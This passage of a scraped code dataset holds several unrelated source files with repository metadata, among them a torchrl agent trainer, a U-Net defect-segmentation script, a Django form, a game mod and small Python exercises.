value)\n selected_keys (iterable of str, optional): a list of strings that\n indicate the data that should be kept from the data collector.\n Since storing and retrieving information from the replay buffer\n does not come for free, limiting the amount of data passed to\n it can improve the algorithm performance. Default is None,\n i.e. 
all keys are kept.\n\n \"\"\"\n\n # trackers\n _optim_count: int = 0\n _collected_frames: int = 0\n _last_log: dict = {}\n _last_save: int = 0\n _log_interval: int = 10000\n _reward_stats: dict = {\"decay\": 0.999}\n\n def __init__(\n self,\n collector: _DataCollector,\n total_frames: int,\n loss_module: Union[_LossModule, Callable[[_TensorDict], _TensorDict]],\n optimizer: optim.Optimizer,\n recorder: Optional[_EnvClass] = None,\n optim_scheduler: Optional[optim.lr_scheduler._LRScheduler] = None,\n target_net_updater: Optional[_TargetNetUpdate] = None,\n policy_exploration: Optional[TDModuleWrapper] = None,\n replay_buffer: Optional[ReplayBuffer] = None,\n writer: Optional[\"SummaryWriter\"] = None,\n update_weights_interval: int = -1,\n record_interval: int = 10000,\n record_frames: int = 1000,\n frame_skip: int = 1,\n optim_steps_per_batch: int = 500,\n batch_size: int = 256,\n clip_grad_norm: bool = True,\n clip_norm: float = 100.0,\n progress_bar: bool = True,\n seed: int = 42,\n save_agent_interval: int = 10000,\n save_agent_file: Optional[Union[str, pathlib.Path]] = None,\n normalize_rewards_online: bool = False,\n sub_traj_len: int = -1,\n min_sub_traj_len: int = -1,\n selected_keys: Optional[Sequence[str]] = None,\n ) -> None:\n\n # objects\n self.collector = collector\n self.loss_module = loss_module\n self.recorder = recorder\n self.optimizer = optimizer\n self.optim_scheduler = optim_scheduler\n self.replay_buffer = replay_buffer\n self.policy_exploration = policy_exploration\n self.target_net_updater = target_net_updater\n self.writer = writer\n self._params = []\n for p in self.optimizer.param_groups:\n self._params += p[\"params\"]\n\n # seeding\n self.seed = seed\n self.set_seed()\n\n # constants\n self.update_weights_interval = update_weights_interval\n self.optim_steps_per_batch = optim_steps_per_batch\n self.batch_size = batch_size\n self.total_frames = total_frames\n self.frame_skip = frame_skip\n self.clip_grad_norm = clip_grad_norm\n self.clip_norm = clip_norm\n if progress_bar and not _has_tqdm:\n warnings.warn(\n \"tqdm library not found. 
Consider installing tqdm to use the Agent progress bar.\"\n )\n self.progress_bar = progress_bar and _has_tqdm\n self.record_interval = record_interval\n self.record_frames = record_frames\n self.save_agent_interval = save_agent_interval\n self.save_agent_file = save_agent_file\n self.normalize_rewards_online = normalize_rewards_online\n self.sub_traj_len = sub_traj_len\n self.min_sub_traj_len = min_sub_traj_len\n self.selected_keys = selected_keys\n\n def save_agent(self) -> None:\n _save = False\n if self.save_agent_file is not None:\n if (self._collected_frames - self._last_save) > self.save_agent_interval:\n self._last_save = self._collected_frames\n _save = True\n if _save:\n torch.save(self.state_dict(), self.save_agent_file)\n\n def load_from_file(self, file: Union[str, pathlib.Path]) -> Agent:\n loaded_dict: OrderedDict = torch.load(file)\n\n # checks that keys match\n expected_keys = {\n \"env\",\n \"loss_module\",\n \"_collected_frames\",\n \"_last_log\",\n \"_last_save\",\n \"_optim_count\",\n }\n actual_keys = set(loaded_dict.keys())\n if len(actual_keys.difference(expected_keys)) or len(\n expected_keys.difference(actual_keys)\n ):\n raise RuntimeError(\n f\"Expected keys {expected_keys} in the loaded file but got\"\n f\" {actual_keys}\"\n )\n self.collector.load_state_dict(loaded_dict[\"env\"])\n self.model.load_state_dict(loaded_dict[\"model\"])\n for key in [\n \"_collected_frames\",\n \"_last_log\",\n \"_last_save\",\n \"_optim_count\",\n ]:\n setattr(self, key, loaded_dict[key])\n return self\n\n def set_seed(self):\n seed = self.collector.set_seed(self.seed)\n torch.manual_seed(seed)\n np.random.seed(seed)\n\n def state_dict(self) -> Dict:\n state_dict = OrderedDict(\n env=self.collector.state_dict(),\n loss_module=self.loss_module.state_dict(),\n _collected_frames=self._collected_frames,\n _last_log=self._last_log,\n _last_save=self._last_save,\n _optim_count=self._optim_count,\n )\n return state_dict\n\n def load_state_dict(self, state_dict: Dict) -> None:\n model_state_dict = state_dict[\"loss_module\"]\n env_state_dict = state_dict[\"env\"]\n self.loss_module.load_state_dict(model_state_dict)\n self.collector.load_state_dict(env_state_dict)\n\n @property\n def collector(self) -> _DataCollector:\n return self._collector\n\n @collector.setter\n def collector(self, collector: _DataCollector) -> None:\n self._collector = collector\n\n def train(self):\n if self.progress_bar:\n self._pbar = tqdm(total=self.total_frames)\n self._pbar_str = OrderedDict()\n\n collected_frames = 0\n for i, batch in enumerate(self.collector):\n if self.selected_keys:\n batch = batch.select(*self.selected_keys, \"mask\")\n\n if \"mask\" in batch.keys():\n current_frames = batch.get(\"mask\").sum().item() * self.frame_skip\n else:\n current_frames = batch.numel() * self.frame_skip\n collected_frames += current_frames\n self._collected_frames = collected_frames\n\n if self.replay_buffer is not None:\n if \"mask\" in batch.keys():\n batch = batch[batch.get(\"mask\").squeeze(-1)]\n else:\n batch = batch.reshape(-1)\n reward_training = batch.get(\"reward\").mean().item()\n batch = batch.cpu()\n self.replay_buffer.extend(batch)\n else:\n if \"mask\" in batch.keys():\n reward_training = batch.get(\"reward\")\n mask = batch.get(\"mask\").squeeze(-1)\n reward_training = reward_training[mask].mean().item()\n else:\n reward_training = batch.get(\"reward\").mean().item()\n\n if self.normalize_rewards_online:\n reward = batch.get(\"reward\")\n self._update_reward_stats(reward)\n\n if collected_frames > 
self.collector.init_random_frames:\n self.steps(batch)\n self._collector_scheduler_step(i, current_frames)\n\n self._log(reward_training=reward_training)\n if self.progress_bar:\n self._pbar.update(current_frames)\n self._pbar_description()\n\n if collected_frames > self.total_frames:\n break\n\n self.collector.shutdown()\n\n @torch.no_grad()\n def _update_reward_stats(self, reward: torch.Tensor) -> None:\n decay = self._reward_stats.get(\"decay\", 0.999)\n sum = self._reward_stats[\"sum\"] = (\n decay * self._reward_stats.get(\"sum\", 0.0) + reward.sum()\n )\n ssq = self._reward_stats[\"ssq\"] = (\n decay * self._reward_stats.get(\"ssq\", 0.0) + reward.pow(2).sum()\n )\n count = self._reward_stats[\"count\"] = (\n decay * self._reward_stats.get(\"count\", 0.0) + reward.numel()\n )\n\n mean = self._reward_stats[\"mean\"] = sum / count\n var = self._reward_stats[\"var\"] = ssq / count - mean.pow(2)\n self._reward_stats[\"std\"] = var.clamp_min(1e-6).sqrt()\n\n def _normalize_reward(self, tensordict: _TensorDict) -> None:\n reward = tensordict.get(\"reward\")\n reward = reward - self._reward_stats[\"mean\"]\n reward = reward / self._reward_stats[\"std\"]\n tensordict.set_(\"reward\", reward)\n\n def _collector_scheduler_step(self, step: int, current_frames: int):\n \"\"\"Runs entropy annealing steps for exploration, policy weights update\n across workers etc.\n\n \"\"\"\n\n if self.policy_exploration is not None and hasattr(\n self.policy_exploration, \"step\"\n ):\n self.policy_exploration.step(current_frames)\n\n if step % self.update_weights_interval == 0:\n self.collector.update_policy_weights_()\n\n def steps(self, batch: _TensorDict) -> None:\n average_grad_norm = 0.0\n average_losses = None\n\n self.loss_module.apply(reset_noise) # TODO: group in loss_module.reset?\n self.loss_module.reset()\n\n for j in range(self.optim_steps_per_batch):\n self._optim_count += 1\n if self.replay_buffer is not None:\n sub_batch = self.replay_buffer.sample(self.batch_size)\n else:\n sub_batch = self._sub_sample_batch(batch)\n\n if self.normalize_rewards_online:\n self._normalize_reward(sub_batch)\n\n sub_batch_device = sub_batch.to(self.loss_module.device)\n losses_td = self.loss_module(sub_batch_device)\n if isinstance(self.replay_buffer, TensorDictPrioritizedReplayBuffer):\n self.replay_buffer.update_priority(sub_batch_device)\n\n # sum all keys that start with 'loss_'\n loss = sum(\n [item for key, item in losses_td.items() if key.startswith(\"loss\")]\n )\n loss.backward()\n if average_losses is None:\n average_losses: _TensorDict = losses_td.detach()\n else:\n for key, item in losses_td.items():\n val = average_losses.get(key)\n average_losses.set(key, val * j / (j + 1) + item / (j + 1))\n\n grad_norm = self._grad_clip()\n average_grad_norm = average_grad_norm * j / (j + 1) + grad_norm / (j + 1)\n self.optimizer.step()\n self.optimizer.zero_grad()\n\n self._optim_schedule_step()\n\n if self._optim_count % self.record_interval == 0:\n self.record()\n\n if self.optim_steps_per_batch > 0:\n self._log(\n grad_norm=average_grad_norm,\n optim_steps=self._optim_count,\n **average_losses,\n )\n\n def _optim_schedule_step(self) -> None:\n \"\"\"Runs scheduler steps, target network update steps etc.\n Returns:\n \"\"\"\n if self.optim_scheduler is not None:\n self.optim_scheduler.step()\n if self.target_net_updater is not None:\n self.target_net_updater.step()\n\n def _sub_sample_batch(self, batch: _TensorDict) -> _TensorDict:\n \"\"\"Sub-sampled part of a batch randomly.\n\n If the batch has one dimension, 
a random subsample of length\n self.bach_size will be returned. If the batch has two or more\n dimensions, it is assumed that the first dimension represents the\n batch, and the second the time. If so, the resulting subsample will\n contain consecutive samples across time.\n \"\"\"\n\n if batch.ndimension() == 1:\n return batch[torch.randperm(batch.shape[0])[: self.batch_size]]\n\n sub_traj_len = self.sub_traj_len if self.sub_traj_len > 0 else batch.shape[1]\n if \"mask\" in batch.keys():\n # if a valid mask is present, it's important to sample only\n # valid steps\n traj_len = batch.get(\"mask\").sum(1).squeeze()\n sub_traj_len = max(\n self.min_sub_traj_len,\n min(sub_traj_len, traj_len.min().int().item()),\n )\n else:\n traj_len = (\n torch.ones(batch.shape[0], device=batch.device, dtype=torch.bool)\n * batch.shape[1]\n )\n len_mask = traj_len >= sub_traj_len\n valid_trajectories = torch.arange(batch.shape[0])[len_mask]\n\n batch_size = self.batch_size // sub_traj_len\n traj_idx = valid_trajectories[\n torch.randint(\n valid_trajectories.numel(), (batch_size,), device=batch.device\n )\n ]\n\n if sub_traj_len < batch.shape[1]:\n _traj_len = traj_len[traj_idx]\n seq_idx = (\n torch.rand_like(_traj_len, dtype=torch.float)\n * (_traj_len - sub_traj_len)\n ).int()\n seq_idx = seq_idx.unsqueeze(-1).expand(-1, sub_traj_len)\n elif sub_traj_len == batch.shape[1]:\n seq_idx = torch.zeros(\n batch_size, sub_traj_len, device=batch.device, dtype=torch.long\n )\n else:\n raise ValueError(\n f\"sub_traj_len={sub_traj_len} is not allowed. Accepted values \"\n f\"are in the range [1, {batch.shape[1]}].\"\n )\n\n seq_idx = seq_idx + torch.arange(sub_traj_len, device=seq_idx.device)\n td = batch[traj_idx].clone()\n td = td.apply(\n lambda t: t.gather(\n dim=1,\n index=expand_right(seq_idx, (batch_size, sub_traj_len, *t.shape[2:])),\n ),\n batch_size=(batch_size, sub_traj_len),\n )\n if \"mask\" in batch.keys() and not td.get(\"mask\").all():\n raise RuntimeError(\"Sampled invalid steps\")\n return td\n\n def _grad_clip(self) -> float:\n if self.clip_grad_norm:\n gn = nn.utils.clip_grad_norm_(self._params, self.clip_norm)\n else:\n gn = sum([p.grad.pow(2).sum() for p in self._params]).sqrt()\n nn.utils.clip_grad_value_(self._params, self.clip_norm)\n return float(gn)\n\n def _log(self, **kwargs) -> None:\n collected_frames = self._collected_frames\n for key, item in kwargs.items():\n if (collected_frames - self._last_log.get(key, 0)) > self._log_interval:\n self._last_log[key] = collected_frames\n _log = True\n else:\n _log = False\n method = WRITER_METHODS.get(key, \"add_scalar\")\n if _log and self.writer is not None:\n getattr(self.writer, method)(key, item, global_step=collected_frames)\n if method == \"add_scalar\" and self.progress_bar:\n self._pbar_str[key] = float(item)\n\n def _pbar_description(self) -> None:\n if self.progress_bar:\n self._pbar.set_description(\n \", \".join(\n [\n f\"{key}: {float(item):4.4f}\"\n for key, item in self._pbar_str.items()\n ]\n )\n )\n\n @torch.no_grad()\n @set_exploration_mode(\"mode\")\n def record(self) -> None:\n if self.recorder is not None:\n self.policy_exploration.eval()\n self.recorder.eval()\n if isinstance(self.recorder, TransformedEnv):\n self.recorder.transform.eval()\n td_record = self.recorder.rollout(\n policy=self.policy_exploration,\n n_steps=self.record_frames,\n )\n self.policy_exploration.train()\n self.recorder.train()\n reward = td_record.get(\"reward\").mean() / self.frame_skip\n self._log(reward_evaluation=reward)\n 
self.recorder.transform.dump()\n\n def __repr__(self) -> str:\n loss_str = indent(f\"loss={self.loss_module}\", 4 * \" \")\n policy_str = indent(f\"policy_exploration={self.policy_exploration}\", 4 * \" \")\n collector_str = indent(f\"collector={self.collector}\", 4 * \" \")\n buffer_str = indent(f\"buffer={self.replay_buffer}\", 4 * \" \")\n optimizer_str = indent(f\"optimizer={self.optimizer}\", 4 * \" \")\n target_net_updater = indent(\n f\"target_net_updater={self.target_net_updater}\", 4 * \" \"\n )\n writer = indent(f\"writer={self.writer}\", 4 * \" \")\n\n string = \"\\n\".join(\n [\n loss_str,\n policy_str,\n collector_str,\n buffer_str,\n optimizer_str,\n target_net_updater,\n writer,\n ]\n )\n string = f\"Agent(\\n{string})\"\n return string\n","repo_name":"feemthan/rl","sub_path":"torchrl/agents/agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":23399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"}
+{"seq_id":"46898965240","text":"import tkinter\nimport frames\n\n\nclass MainWindow(tkinter.Tk):\n def __init__(self, _database):\n super().__init__()\n # self.geometry('500x500')\n self.db = _database\n self.title('OHS - Point of Sale')\n\n self.main_frame = frames.TreeFrame(self, self.db)\n self.main_frame.pack()\n\n self.inputs_frame = frames.InputFrame(self, self.db)\n self.inputs_frame.pack()\n\n def loop(self):\n self.mainloop()\n","repo_name":"robertleblanc/POS","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23432150491","text":"test = int(input())\nfor i in range(1,test+1):\n\tcount = int(input())\n\tnoami = list(map(float,input().split()))\n\tken = list(map(float,input().split()))\n\tnoami.sort()\n\tken.sort()\n\twar = 0\n\tdec = 0\n\ten = count -1\n\tst = 0\n\tj = count -1\n\twhile j >= 0:\n\t\tif noami[j] > ken[en]:\n\t\t\twar= war+1\n\t\telse:\n\t\t\ten = en -1\n\t\tj = j-1\n\ten = count -1\n\tj = 0 \n\tk = count -1\n\twhile k >= 0:\n\t\tif noami[j] > ken[st]:\n\t\t\tdec = dec+1\n\t\t\tst = st + 1\n\t\telse:\n\t\t\ten = en -1\n\t\tk = k -1\n\t\tj = j +1\n\tprint(\"Case #\"+str(i)+\": \"+str(dec)+\" \"+str(war))\n\t\n\t\t\t\n\t\t\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_138/1149.py","file_name":"1149.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"22037420335","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 2 20:59:46 2022\r\n\r\n@author: alexo\r\n\"\"\"\r\n\r\nfrom multi_unet_model import multi_unet_model #Uses softmax \r\n\r\nfrom tensorflow.keras.utils import normalize\r\nimport os\r\nimport glob\r\nimport cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\r\n\r\n#Resizing images, if needed\r\nSIZE_X = 256\r\nSIZE_Y = 256\r\nn_classes=3 #Number of classes for segmentation\r\n\r\n#Capture training image info as a list\r\ntrain_images = []\r\n\r\nfor directory_path in glob.glob(\"Gear/labels/labeled_images\"):\r\n for img_path in glob.glob(os.path.join(directory_path, \"*.png\")):\r\n img = cv2.imread(img_path, 0) \r\n #img = cv2.cvtColor(img,cv2.COLOR_GRAY2RGB)\r\n img = cv2.resize(img, (SIZE_Y, SIZE_X))\r\n train_images.append(img)\r\n \r\n#Convert list to array for machine learning processing \r\ntrain_images = np.array(train_images)\r\n\r\n\r\n#Capture mask/label info as a list\r\ntrain_masks = [] \r\nfor directory_path in glob.glob(\"Gear/labels/labeled_masks\"):\r\n for mask_path in glob.glob(os.path.join(directory_path, \"*.tiff\")):\r\n mask = cv2.imread(mask_path, 0) \r\n mask = cv2.resize(mask, (SIZE_Y, SIZE_X), interpolation = cv2.INTER_NEAREST) #Otherwise ground truth changes due to interpolation\r\n train_masks.append(mask)\r\n \r\n#Convert list to array for machine learning processing \r\ntrain_masks = np.array(train_masks)\r\n\r\nnp.unique(train_masks)\r\ntrain_masks = np.where(train_masks == 3, 0, train_masks) #label=3 is a error, transform it to blackground (=0)\r\nnp.unique(train_masks)\r\n###############################################\r\n#Encode labels... but multi dim array so need to flatten, encode and reshape\r\nfrom sklearn.preprocessing import LabelEncoder\r\nlabelencoder = LabelEncoder()\r\nn, h, w = train_masks.shape\r\ntrain_masks_reshaped = train_masks.reshape(-1,1)\r\ntrain_masks_reshaped_encoded = labelencoder.fit_transform(train_masks_reshaped)\r\ntrain_masks_encoded_original_shape = train_masks_reshaped_encoded.reshape(n, h, w)\r\n\r\nnp.unique(train_masks_encoded_original_shape)\r\n\r\n\r\n#################################################\r\ntrain_images = np.expand_dims(train_images, axis=3)\r\ntrain_images = normalize(train_images, axis=1)\r\n\r\ntrain_masks_input = np.expand_dims(train_masks_encoded_original_shape, axis=3)\r\n\r\n#Split dataset into train and test\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(train_images, train_masks_input, test_size = 0.10, random_state = 0)\r\n\r\nprint(\"Class values in the dataset are ... 
\", np.unique(y_train)) # 0 is the background\r\n\r\nfrom tensorflow.keras.utils import to_categorical\r\ntrain_masks_cat = to_categorical(y_train, num_classes=n_classes)\r\ny_train_cat = train_masks_cat.reshape((y_train.shape[0], y_train.shape[1], y_train.shape[2], n_classes))\r\n\r\ntest_masks_cat = to_categorical(y_test, num_classes=n_classes)\r\ny_test_cat = test_masks_cat.reshape((y_test.shape[0], y_test.shape[1], y_test.shape[2], n_classes))\r\n\r\n###############################################################\r\n#Use class weights to make the small pixels of defect more important in the model\r\nfrom sklearn.utils import class_weight\r\nclass_weights = class_weight.compute_class_weight(\r\n class_weight = \"balanced\",\r\n classes = np.unique(train_masks_reshaped_encoded),\r\n y = train_masks_reshaped_encoded \r\n )\r\n\r\n#weight = class_weight.compute_class_weight('balanced', np.unique(y_train), y_train)\r\nclass_weights = {i : class_weights[i] for i in range(3)}\r\nprint(\"Class weights are...:\", class_weights)\r\n\r\nIMG_HEIGHT = X_train.shape[1]\r\nIMG_WIDTH = X_train.shape[2]\r\nIMG_CHANNELS = X_train.shape[3]\r\n\r\ndef get_model():\r\n return multi_unet_model(n_classes=n_classes, IMG_HEIGHT=IMG_HEIGHT, IMG_WIDTH=IMG_WIDTH, IMG_CHANNELS=IMG_CHANNELS)\r\n\r\nmodel = get_model()\r\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\r\nmodel.summary()\r\n\r\n\r\nhistory = model.fit(X_train, y_train_cat, \r\n batch_size = 5, \r\n verbose=1, \r\n epochs=20, \r\n validation_data=(X_test, y_test_cat), \r\n #sample_weight=class_weights,\r\n shuffle=False)\r\n \r\n\r\n\r\nmodel.save('Gear_model_multiUnet_.hdf5')\r\n############################################################\r\n#Evaluate the model\r\n\t# evaluate model\r\n_, acc = model.evaluate(X_test, y_test_cat)\r\nprint(\"Accuracy is = \", (acc * 100.0), \"%\")\r\n\r\n###\r\n#plot the training and validation accuracy and loss at each epoch\r\nloss = history.history['loss']\r\nval_loss = history.history['val_loss']\r\nepochs = range(1, len(loss) + 1)\r\nplt.plot(epochs, loss, 'y', label='Training loss')\r\nplt.plot(epochs, val_loss, 'r', label='Validation loss')\r\nplt.title('Training and validation loss')\r\nplt.xlabel('Epochs')\r\nplt.ylabel('Loss')\r\nplt.legend()\r\nplt.show()\r\n\r\nacc = history.history['accuracy']\r\nval_acc = history.history['val_accuracy']\r\n\r\nplt.plot(epochs, acc, 'y', label='Training Accuracy')\r\nplt.plot(epochs, val_acc, 'r', label='Validation Accuracy')\r\nplt.title('Training and validation Accuracy')\r\nplt.xlabel('Epochs')\r\nplt.ylabel('Accuracy')\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n##################################\r\n#model = get_model()\r\n#model.load_weights('Gear_model_multiUnet_.hdf5') \r\n\r\n\r\n#IOU\r\ny_pred=model.predict(X_test)\r\ny_pred_argmax=np.argmax(y_pred, axis=3)\r\n\r\n##################################################\r\n\r\n#Using built in keras function\r\nfrom keras.metrics import MeanIoU\r\nIOU_keras = MeanIoU(num_classes=n_classes) \r\nIOU_keras.update_state(y_test[:,:,:,0], y_pred_argmax)\r\nprint(\"Mean IoU =\", IOU_keras.result().numpy())\r\n\r\n\r\n#To calculate I0U for each class...\r\nvalues = np.array(IOU_keras.get_weights()).reshape(n_classes, n_classes)\r\nprint(values)\r\nclass1_IoU = values[0,0]/(values[0,0] + values[0,1] + values[0,2] + values[1,0]+ values[2,0])\r\nclass2_IoU = values[1,1]/(values[1,1] + values[1,0] + values[1,2] + values[0,1]+ values[2,1])\r\nclass3_IoU = values[2,2]/(values[2,2] + values[2,0] + 
values[2,1] + values[0,2]+ values[1,2])\r\n\r\n\r\nprint(\"IoU for class1 is: \", class1_IoU)\r\nprint(\"IoU for class2 is: \", class2_IoU)\r\nprint(\"IoU for class3 is: \", class3_IoU)\r\n\r\n\r\nplt.imshow(train_images[3, :,:,0], cmap='gray')\r\nplt.imshow(train_masks[3], cmap='gray')\r\n#######################################################################\r\n#Predict on a few images\r\n#model = get_model()\r\n#model.load_weights('Gear_model_multiUnet_.hdf5'.hdf5') \r\nimport random\r\ntest_img_number = random.randint(0, len(X_test))\r\ntest_img = X_test[test_img_number]\r\nground_truth=y_test[test_img_number]\r\ntest_img_norm=test_img[:,:,0][:,:,None]\r\ntest_img_input=np.expand_dims(test_img_norm, 0)\r\nprediction = (model.predict(test_img_input))\r\npredicted_img=np.argmax(prediction, axis=3)[0,:,:]\r\n\r\n\r\nplt.figure(figsize=(12, 8))\r\nplt.subplot(231)\r\nplt.title('Testing Image')\r\nplt.imshow(test_img[:,:,0], cmap='gray')\r\nplt.subplot(232)\r\nplt.title('Testing Label')\r\nplt.imshow(ground_truth[:,:,0], cmap='jet')\r\nplt.subplot(233)\r\nplt.title('Prediction on test image')\r\nplt.imshow(predicted_img, cmap='jet')\r\nplt.show()\r\n","repo_name":"alexoli97/Defect-detection-in-Industrial-pieces","sub_path":"multi_classification.py","file_name":"multi_classification.py","file_ext":"py","file_size_in_byte":7423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"24338580905","text":"from typing import List, Tuple\nimport random\n\nimport unrealsdk\n\nfrom .kills import KillsChallenge\nfrom ...mixins import FeedbackMixin\nfrom ...mixins import RewardMixin\nfrom ...rewards import ERewardType\nfrom ...rewards import get_balanced_reward\n\nRANGES: List[Tuple[int, int]] = [(15, 30), (30, 50), (35, 70)] # (min, max) for NVHM, TVHM and UVHM\n\nDAMAGE_TYPES = {\n \"Corrosive\": \"GD_Corrosive\",\n \"Explosive\": \"GD_Explosive\",\n \"Non-Elemental\": \"GD_Impact\",\n \"Incendiary\": \"GD_Incendiary\",\n \"Shock\": \"GD_Shock\",\n \"Slag\": \"GD_Amp\",\n}\n\n\nclass ElementalKillsChallenge(KillsChallenge, FeedbackMixin, RewardMixin):\n key = \"Elemental\"\n reward_type = ERewardType.RARE\n\n def __init__(self):\n super().__init__()\n self.needs = 1\n self.track = \"Elements\"\n self._name = \"ElementKills\"\n self.reward = None\n\n @property\n def completed(self) -> bool:\n return self.has >= self.needs\n\n def on_killed_enemy(\n self,\n caller: unrealsdk.UObject,\n function: unrealsdk.UFunction,\n params: unrealsdk.FStruct\n ) -> None:\n if self.track in str(params.Pipeline.DamageTypeDef):\n self.has += 1\n self.progress_feedback()\n\n def reset_progress(self):\n super().reset_progress()\n\n self.needs = random.randint(*RANGES[self.playthrough_index]) # Update needed Kills\n name, self.track = random.choice(list(DAMAGE_TYPES.items())) # Update Tracked Body Tag\n\n self._name = f\"Get {name} Kills\"\n self.reward = get_balanced_reward(self.playthrough_index, self.level, self.reward_type)\n","repo_name":"juso40/bl2sdk_Mods","sub_path":"BadassBounties/challenges/kills/element.py","file_name":"element.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"61"}
+{"seq_id":"41983036092","text":"# 9. Print the Floyd's triangle with given input n\r\n# INPUT : n=5\r\n# 1 \r\n# 2 3 \r\n# 4 5 6 \r\n# 7 8 9 10 \r\n# 11 12 13 14 15 \r\n\r\nn = int(input())\r\nx = int(input())\r\nfor i in range(1,n+1):\r\n\tfor j in range(1,i+1):\r\n\t\tprint(x,end=\" \")\r\n\t\tx=x+1\r\n\tprint()","repo_name":"19wh1a1276/19WH1A1276_2023","sub_path":"pattern_10.py","file_name":"pattern_10.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"18624286596","text":"from django import forms\nfrom .models import *\nfrom django.core.validators import MaxValueValidator, MinValueValidator\n\nGENDERS= [\n ('male', 'Male'),\n ('female', 'Female'),\n ('prefer not to say', 'Prefer not to say')\n ]\n\nDESIGNATIONS= [\n ('Manager', 'Manager'),\n ('Developer', 'Developer'),\n ('Associate', 'Associate'),\n ('Trainee', 'Trainee'),\n ('VP', 'VP'),\n ('AVP', 'AVP'),\n ('Chairman','Chairman')\n ]\n\nDEPARTMENTS= [\n ('Content', 'Content'),\n ('Frontend', 'FrontEnd'),\n ('Backend', 'BackEnd'),\n ('Sales', 'Sales'),\n ('HR', 'HR'),\n ('Executive','Executive')\n ]\n \nclass AddEmployeeForm(forms.ModelForm):\n class Meta:\n model = Employees\n fields = '__all__'\n employee_name = forms.CharField(label='Name', max_length=100)\n employee_age = forms.IntegerField(label='Age',validators=[MaxValueValidator(60),MinValueValidator(20)])\n employee_gender = forms.CharField(label='Gender', widget=forms. Select(choices=GENDERS))\n employee_phone = forms.CharField(label='Mobile', max_length=100)\n employee_email = forms.EmailField(label='Email', max_length=100)\n employee_dept = forms.CharField(label='Department', widget=forms. Select(choices=DEPARTMENTS))\n employee_desg = forms.CharField(label='Designation', widget=forms. Select(choices=DESIGNATIONS))\n profile_pic = forms.ImageField(label='Profile Photo')\n verification_doc = forms.FileField(label='Document')\n \n\nclass GetEmployeeForm(forms.ModelForm):\n class Meta:\n model = Employees\n fields = '__all__'\n employee_name = forms.CharField(label='Name', max_length=100)","repo_name":"rodincode/EmployeeManagementApp","sub_path":"employees/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"38565210865","text":"def item_price(item):\n menu = {\n \"Baja Taco\": 4.25,\n \"Burrito\": 7.50,\n \"Bowl\": 8.50,\n \"Nachos\": 11.00,\n \"Quesadilla\": 8.50,\n \"Super Burrito\": 8.50,\n \"Super Quesadilla\": 9.50,\n \"Taco\": 3.00,\n \"Tortilla Salad\": 8.00\n }\n\n item_capitalize = item.capitalize()\n\n if item_capitalize in menu:\n return menu[item_capitalize]\n else:\n return None\n\ndef main():\n total_cost = 0.0\n try:\n while True:\n item = input(\"Item: \")\n cost = item_price(item)\n\n if cost is not None:\n total_cost += cost\n print(f\"Item cost:${cost:.2f}.\")\n else:\n print(\"Item not on menu.\")\n except EOFError:\n print(f\"Total: ${total_cost:.2f}\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nogueira-tiago/CS50-Python","sub_path":"problem_set_6/lines/taqueria.py","file_name":"taqueria.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"29364714031","text":"from __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\n\nDOCUMENTATION = '''\n---\nmodule: ec2_vol_facts\nshort_description: Gather facts about ec2 volumes in AWS\ndescription:\n - Gather facts about ec2 volumes in AWS\nversion_added: \"2.1\"\nrequirements: [ boto3 ]\nauthor: \"Rob White (@wimnat)\"\noptions:\n filters:\n description:\n - A dict of filters to apply. Each dict item consists of a filter key and a filter value.\n See U(http://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeVolumes.html) for possible filters.\nextends_documentation_fragment:\n - aws\n - ec2\n'''\n\nEXAMPLES = '''\n# Note: These examples do not set authentication details, see the AWS Guide for details.\n\n# Gather facts about all volumes\n- ec2_vol_facts:\n\n# Gather facts about a particular volume using volume ID\n- ec2_vol_facts:\n filters:\n volume-id: vol-00112233\n\n# Gather facts about any volume with a tag key Name and value Example\n- ec2_vol_facts:\n filters:\n \"tag:Name\": Example\n\n# Gather facts about any volume that is attached\n- ec2_vol_facts:\n filters:\n attachment.status: attached\n\n'''\n\n# TODO: Disabled the RETURN as it was breaking docs building. Someone needs to\n# fix this\nRETURN = '''# '''\n\nimport traceback\n\ntry:\n from botocore.exceptions import ClientError\nexcept ImportError:\n pass # caught by imported HAS_BOTO3\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils.ec2 import connect_to_aws, ec2_argument_spec, get_aws_connection_info, boto3_conn, HAS_BOTO3, boto3_tag_list_to_ansible_dict\nfrom ansible.module_utils.ec2 import ansible_dict_to_boto3_filter_list, camel_dict_to_snake_dict\nfrom ansible.module_utils._text import to_native\n\n\ndef get_volume_info(volume, region):\n\n attachment = volume[\"attachments\"]\n\n volume_info = {\n 'create_time': volume[\"create_time\"],\n 'id': volume[\"volume_id\"],\n 'encrypted': volume[\"encrypted\"],\n 'iops': volume[\"iops\"] if \"iops\" in volume else None,\n 'size': 